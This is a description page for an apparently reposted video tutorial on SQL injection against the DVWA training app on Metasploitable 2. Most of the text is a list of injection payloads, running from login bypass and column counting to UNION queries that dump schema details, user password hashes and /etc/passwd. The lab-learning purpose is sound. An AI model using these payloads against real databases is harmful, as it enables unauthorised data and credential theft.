Description: This video is all about SQL Injection on DVWA – Security Level Easy.
In this video I will cover almost all SQL Injection queries. Use Metasploitable – 2 for DVWA. I will cover from very basic to very advanced level of SQL injection.
Steps : -
' or 1=1 #
'OR '1'='1' -- ';
1' order by 1 #
2' order by 1 #
3' order by 1 #
4' order by 1 #
5' order by 1 #
1' or 1=1 order by 1 #
' and 1=1 union select database(),version() #
' union SELECT 1, @@version #
' and 1=1 union select null,user() #
' union SELECT 1, user() #
' and 1=1 union select null,table_schema from information_schema.tables #
' and 1=1 union select table_name,table_schema from information_schema.tables #
' and 1=1 union select table_name,table_schema from information_schema.tables where table_schema='dvwa' #
' and 1=1 union select table_name,column_name from information_schema.column where table_schema='dvwa' #
' and 1=1 union select first_name,password from dvwa.users #
' union SELECT 1, load_file('/etc/hosts') #
' union SELECT 1, load_file('/etc/passwd') #
' union SELECT table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' #
' union SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'user_id' #
' union select user, password FROM users #
Reference : -
http://www.hackyeah.com/2010/05/hack-yeah-sql-injection-walkthrough-dvwa/
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
Tags: hacking , hack , sql-injection , exploitation ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.